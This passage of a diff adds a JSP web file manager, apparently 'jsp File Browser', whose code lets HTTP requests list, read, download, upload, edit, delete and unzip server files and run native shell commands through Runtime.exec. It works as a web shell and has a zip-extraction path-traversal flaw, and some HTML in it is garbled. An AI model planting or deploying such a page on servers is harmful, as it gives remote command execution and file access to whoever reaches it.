    +								.substring(tempIndexf1);
    +						String tempEndf2 = f2.getAbsolutePath().toUpperCase()
    +								.substring(tempIndexf2);
    +						return sign * tempEndf1.compareTo(tempEndf2);
    +					}
    +				}
    +				default:
    +					return 1;
    +				}
    +			}
    +		}
    +	}
    +
    +	/**
    +	 * Wrapperclass to wrap an OutputStream around a Writer
    +	 */
    +	class Writer2Stream extends OutputStream {
    +
    +		Writer out;
    +
    +		Writer2Stream(Writer w) {
    +			super();
    +			out = w;
    +		}
    +
    +		public void write(int i) throws IOException {
    +			out.write(i);
    +		}
    +
    +		public void write(byte[] b) throws IOException {
    +			for (int i = 0; i < b.length; i++) {
    +				int n = b[i];
    +				//Convert byte to ubyte
    +				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
    +				out.write(n);
    +			}
    +		}
    +
    +		public void write(byte[] b, int off, int len) throws IOException {
    +			for (int i = off; i < off + len; i++) {
    +				int n = b[i];
    +				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
    +				out.write(n);
    +			}
    +		}
    +	} //End of class Writer2Stream
    +
    +	static Vector expandFileList(String[] files, boolean inclDirs) {
    +		Vector v = new Vector();
    +		if (files == null) return v;
    +		for (int i = 0; i < files.length; i++)
    +			v.add(new File(URLDecoder.decode(files[i])));
    +		for (int i = 0; i < v.size(); i++) {
    +			File f = (File) v.get(i);
    +			if (f.isDirectory()) {
    +				File[] fs = f.listFiles();
    +				for (int n = 0; n < fs.length; n++)
    +					v.add(fs[n]);
    +				if (!inclDirs) {
    +					v.remove(i);
    +					i--;
    +				}
    +			}
    +		}
    +		return v;
    +	}
    +
    +	/**
    +	 * Method to build an absolute path
    +	 * @param dir the root dir
    +	 * @param name the name of the new directory
    +	 * @return if name is an absolute directory, returns name, else returns dir+name
    +	 */
    +	static String getDir(String dir, String name) {
    +		if (!dir.endsWith(File.separator)) dir = dir + File.separator;
    +		File mv = new File(name);
    +		String new_dir = null;
    +		if (!mv.isAbsolute()) {
    +			new_dir = dir + name;
    +		}
    +		else new_dir = name;
    +		return new_dir;
    +	}
    +
    +	/**
    +	 * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
    +	 *     @param size The size in bytes
    +	 *     @return String with size and unit
    +	 */
    +	static String convertFileSize(long size) {
    +		int divisor = 1;
    +		String unit = "bytes";
    +		if (size >= 1024 * 1024) {
    +			divisor = 1024 * 1024;
    +			unit = "MB";
    +		}
    +		else if (size >= 1024) {
    +			divisor = 1024;
    +			unit = "KB";
    +		}
    +		if (divisor == 1) return size / divisor + " " + unit;
    +		String aftercomma = "" + 100 * (size % divisor) / divisor;
    +		if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
    +		return size / divisor + "." + aftercomma + " " + unit;
    +	}
    +
    +	/**
    +	 * Copies all data from in to out
    +	 * 	@param in the input stream
    +	 *	@param out the output stream
    +	 *	@param buffer copy buffer
    +	 */
    +	static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
    +		copyStreamsWithoutClose(in, out, buffer);
    +		in.close();
    +		out.close();
    +	}
    +
    +	/**
    +	 * Copies all data from in to out
    +	 * 	@param in the input stream
    +	 *	@param out the output stream
    +	 *	@param buffer copy buffer
    +	 */
    +	static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
    +			throws IOException {
    +		int b;
    +		while ((b = in.read(buffer)) != -1)
    +			out.write(buffer, 0, b);
    +	}
    +
    +	/**
    +	 * Returns the Mime Type of the file, depending on the extension of the filename
    +	 */
    +	static String getMimeType(String fName) {
    +		fName = fName.toLowerCase();
    +		if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
    +		else if (fName.endsWith(".gif")) return "image/gif";
    +		else if (fName.endsWith(".pdf")) return "application/pdf";
    +		else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
    +		else if (fName.endsWith(".avi")) return "video/x-msvideo";
    +		else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
    +		else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
    +		else if (fName.endsWith(".zip")) return "application/zip";
    +		else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
    +		else if (fName.endsWith(".rtf")) return "application/rtf";
    +		else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
    +		else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
    +				|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
    +				|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
    +		else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
    +		else if (fName.endsWith(".png")) return "image/png";
    +		else if (fName.endsWith(".xml")) return "text/xml";
    +		else if (fName.endsWith(".svg")) return "image/svg+xml";
    +		else if (fName.endsWith(".mp3")) return "audio/mp3";
    +		else if (fName.endsWith(".ogg")) return "audio/ogg";
    +		else return "text/plain";
    +	}
    +
    +	/**
    +	 * Converts some important chars (int) to the corresponding html string
    +	 */
    +	static String conv2Html(int i) {
    +		if (i == '&') return "&";
    +		else if (i == '<') return "<";
    +		else if (i == '>') return ">";
    +		else if (i == '"') return """;
    +		else return "" + (char) i;
    +	}
    +
    +	/**
    +	 * Converts a normal string to a html conform string
    +	 */
    +	static String conv2Html(String st) {
    +		StringBuffer buf = new StringBuffer();
    +		for (int i = 0; i < st.length(); i++) {
    +			buf.append(conv2Html(st.charAt(i)));
    +		}
    +		return buf.toString();
    +	}
    +
    +	/**
    +	 * Starts a native process on the server
    +	 * 	@param command the command to start the process
    +	 *	@param dir the dir in which the process starts
    +	 */
    +	static String startProcess(String command, String dir) throws IOException {
    +		StringBuffer ret = new StringBuffer();
    +		String[] comm = new String[3];
    +		comm[0] = COMMAND_INTERPRETER[0];
    +		comm[1] = COMMAND_INTERPRETER[1];
    +		comm[2] = command;
    +		long start = System.currentTimeMillis();
    +		try {
    +			//Start process
    +			Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
    +			//Get input and error streams
    +			BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
    +			BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
    +			boolean end = false;
    +			while (!end) {
    +				int c = 0;
    +				while ((ls_err.available() > 0) && (++c <= 1000)) {
    +					ret.append(conv2Html(ls_err.read()));
    +				}
    +				c = 0;
    +				while ((ls_in.available() > 0) && (++c <= 1000)) {
    +					ret.append(conv2Html(ls_in.read()));
    +				}
    +				try {
    +					ls_proc.exitValue();
    +					//if the process has not finished, an exception is thrown
    +					//else
    +					while (ls_err.available() > 0)
    +						ret.append(conv2Html(ls_err.read()));
    +					while (ls_in.available() > 0)
    +						ret.append(conv2Html(ls_in.read()));
    +					end = true;
    +				}
    +				catch (IllegalThreadStateException ex) {
    +					//Process is running
    +				}
    +				//The process is not allowed to run longer than given time.
    +				if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
    +					ls_proc.destroy();
    +					end = true;
    +					ret.append("!!!! Process has timed out, destroyed !!!!!");
    +				}
    +				try {
    +					Thread.sleep(50);
    +				}
    +				catch (InterruptedException ie) {}
    +			}
    +		}
    +		catch (IOException e) {
    +			ret.append("Error: " + e);
    +		}
    +		return ret.toString();
    +	}
    +
    +	/**
    +	 * Converts a dir string to a linked dir string
    +	 * 	@param dir the directory string (e.g. /usr/local/httpd)
    +	 *	@param browserLink web-path to Browser.jsp
    +	 */
    +	static String dir2linkdir(String dir, String browserLink, int sortMode) {
    +		File f = new File(dir);
    +		StringBuffer buf = new StringBuffer();
    +		while (f.getParentFile() != null) {
    +			if (f.canRead()) {
    +				String encPath = URLEncoder.encode(f.getAbsolutePath());
    +				buf.insert(0, "" + conv2Html(f.getName()) + File.separator + "");
    +			}
    +			else buf.insert(0, conv2Html(f.getName()) + File.separator);
    +			f = f.getParentFile();
    +		}
    +		if (f.canRead()) {
    +			String encPath = URLEncoder.encode(f.getAbsolutePath());
    +			buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + "");
    +		}
    +		else buf.insert(0, f.getAbsolutePath());
    +		return buf.toString();
    +	}
    +
    +	/**
    +	 *	Returns true if the given filename tends towards a packed file
    +	 */
    +	static boolean isPacked(String name, boolean gz) {
    +		return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
    +				|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
    +				.endsWith(".war"));
    +	}
    +
    +	/**
    +	 *	If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
    +	 */
    +	static boolean isAllowed(File path) throws IOException{
    +		if (RESTRICT_BROWSING) {
    +            StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
    +            while (stk.hasMoreTokens()){
    +			    if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
    +                    return RESTRICT_WHITELIST;
    +            }
    +            return !RESTRICT_WHITELIST;
    +		}
    +		else return true;
    +	}
    +
    +	//---------------------------------------------------------------------------------------------------------------
    +
    +	%>
    +<%
    +		//Get the current browsing directory
    +		request.setAttribute("dir", request.getParameter("dir"));
    +		// The browser_name variable is used to keep track of the URI
    +		// of the jsp file itself.  It is used in all link-backs.
    +		final String browser_name = request.getRequestURI();
    +		final String FOL_IMG = "";
    +		boolean nohtml = false;
    +		boolean dir_view = true;
    +		// View file
    +		if (request.getParameter("file") != null) {
    +            File f = new File(request.getParameter("file"));
    +            if (!isAllowed(f)) {
    +                request.setAttribute("dir", f.getParent());
    +                request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
    +            }
    +            else if (f.exists() && f.canRead()) {
    +                if (isPacked(f.getName(), false)) {
    +                    //If zipFile, do nothing here
    +                }
    +                else{
    +                    String mimeType = getMimeType(f.getName());
    +                    response.setContentType(mimeType);
    +                    if (mimeType.equals("text/plain")) response.setHeader(
    +                            "Content-Disposition", "inline;filename=\"temp.txt\"");
    +                    else response.setHeader("Content-Disposition", "inline;filename=\""
    +                            + f.getName() + "\"");
    +                    BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
    +                    byte buffer[] = new byte[8 * 1024];
    +                    out.clearBuffer();
    +                    OutputStream out_s = new Writer2Stream(out);
    +                    copyStreamsWithoutClose(fileInput, out_s, buffer);
    +                    fileInput.close();
    +                    out_s.flush();
    +                    nohtml = true;
    +                    dir_view = false;
    +                }
    +            }
    +            else {
    +                request.setAttribute("dir", f.getParent());
    +                request.setAttribute("error", "File " + f.getAbsolutePath()
    +                        + " does not exist or is not readable on the server");
    +            }
    +		}
    +		// Download selected files as zip file
    +		else if ((request.getParameter("Submit") != null)
    +				&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
    +			Vector v = expandFileList(request.getParameterValues("selfile"), false);
    +			//Check if all files in vector are allowed
    +			String notAllowedFile = null;
    +			for (int i = 0;i < v.size(); i++){
    +				File f = (File) v.get(i);
    +				if (!isAllowed(f)){
    +					notAllowedFile = f.getAbsolutePath();
    +					break;
    +				}
    +			}
    +			if (notAllowedFile != null){
    +				request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
    +			}
    +			else if (v.size() == 0) {
    +				request.setAttribute("error", "No files selected");
    +			}
    +			else {
    +				File dir_file = new File("" + request.getAttribute("dir"));
    +				int dir_l = dir_file.getAbsolutePath().length();
    +				response.setContentType("application/zip");
    +				response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
    +				out.clearBuffer();
    +				ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
    +				zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
    +				zipout.setLevel(COMPRESSION_LEVEL);
    +				for (int i = 0; i < v.size(); i++) {
    +					File f = (File) v.get(i);
    +					if (f.canRead()) {
    +						zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
    +						BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
    +						byte buffer[] = new byte[0xffff];
    +						copyStreamsWithoutClose(fr, zipout, buffer);
    +						/*					int b;
    +						 while ((b=fr.read())!=-1) zipout.write(b);*/
    +						fr.close();
    +						zipout.closeEntry();
    +					}
    +				}
    +				zipout.finish();
    +				out.flush();
    +				nohtml = true;
    +				dir_view = false;
    +			}
    +		}
    +		// Download file
    +		else if (request.getParameter("downfile") != null) {
    +			String filePath = request.getParameter("downfile");
    +			File f = new File(filePath);
    +			if (!isAllowed(f)){
    +				request.setAttribute("dir", f.getParent());
    +				request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
    +			}
    +			else if (f.exists() && f.canRead()) {
    +				response.setContentType("application/octet-stream");
    +				response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
    +						+ "\"");
    +				response.setContentLength((int) f.length());
    +				BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
    +				byte buffer[] = new byte[8 * 1024];
    +				out.clearBuffer();
    +				OutputStream out_s = new Writer2Stream(out);
    +				copyStreamsWithoutClose(fileInput, out_s, buffer);
    +				fileInput.close();
    +				out_s.flush();
    +				nohtml = true;
    +				dir_view = false;
    +			}
    +			else {
    +				request.setAttribute("dir", f.getParent());
    +				request.setAttribute("error", "File " + f.getAbsolutePath()
    +						+ " does not exist or is not readable on the server");
    +			}
    +		}
    +		if (nohtml) return;
    +		//else
    +			// If no parameter is submitted, it will take the path from jsp file browser
    +			if (request.getAttribute("dir") == null) {
    +				String path = null;
    +				if (application.getRealPath(request.getRequestURI()) != null) path = new File(
    +						application.getRealPath(request.getRequestURI())).getParent();
    +
    +				if (path == null) { // handle the case where we are not in a directory (ex: war file)
    +					path = new File(".").getAbsolutePath();
    +				}
    +				//Check path
    +                if (!isAllowed(new File(path))){
    +                    if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
    +                    else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
    +                }
    +				request.setAttribute("dir", path);
    +			}%>
    +
    +
    +
    +
    +
    +
    +
    +<%
    +			//If a cssfile exists, it will take it
    +			String cssPath = null;
    +			if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
    +					application.getRealPath(request.getRequestURI())).getParent()
    +					+ File.separator + CSS_NAME;
    +			if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
    +			if (new File(cssPath).exists()) {
    +%>
    +
    +      <%}
    +			else if (request.getParameter("uplMonitor") == null) {%>
    +	
    +	<%}
    +		
    +        //Check path
    +        if (!isAllowed(new File((String)request.getAttribute("dir")))){
    +            request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
    +        }
    +		//Upload monitor
    +		else if (request.getParameter("uplMonitor") != null) {%>
    +	<%
    +			String fname = request.getParameter("uplMonitor");
    +			//First opening
    +			boolean first = false;
    +			if (request.getParameter("first") != null) first = true;
    +			UplInfo info = new UplInfo();
    +			if (!first) {
    +				info = UploadMonitor.getInfo(fname);
    +				if (info == null) {
    +					//Windows
    +					int posi = fname.lastIndexOf("\\");
    +					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
    +				}
    +				if (info == null) {
    +					//Unix
    +					int posi = fname.lastIndexOf("/");
    +					if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
    +				}
    +			}
    +			dir_view = false;
    +			request.setAttribute("dir", null);
    +			if (info.aborted) {
    +				UploadMonitor.remove(fname);
    +				%>
    +
    +
    +Upload of <%=fname%>

    +Upload aborted.
    +<%
    + }
    + else if (info.totalSize != info.currSize || info.currSize == 0) {
    + %>
    +
    +
    +
    +Upload of <%=fname%>

    +
    +
    +
    +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
    +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
    +
    +<%
    + }
    + else {
    + UploadMonitor.remove(fname);
    + %>
    +
    +
    +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + + +<% + out.println("
    \n" + + " + "> +
    + + + +
    + +
    + "> +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println(""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName()) + + "" + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")))){ + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". 
Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + " + "> +
    + + + + + + + +
    >Ms-Dos/Windows>UnixWrite backup
    + "> +
    +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + else if (request.getParameter("Submit").equals("Save")) { + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root))){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + 
f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. 
Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir))){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file))){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && 
!file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file))){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. 
Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir))){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". 
Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir))){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old)|| !isAllowed(f_new)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". 
Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f)) request.setAttribute("dir", 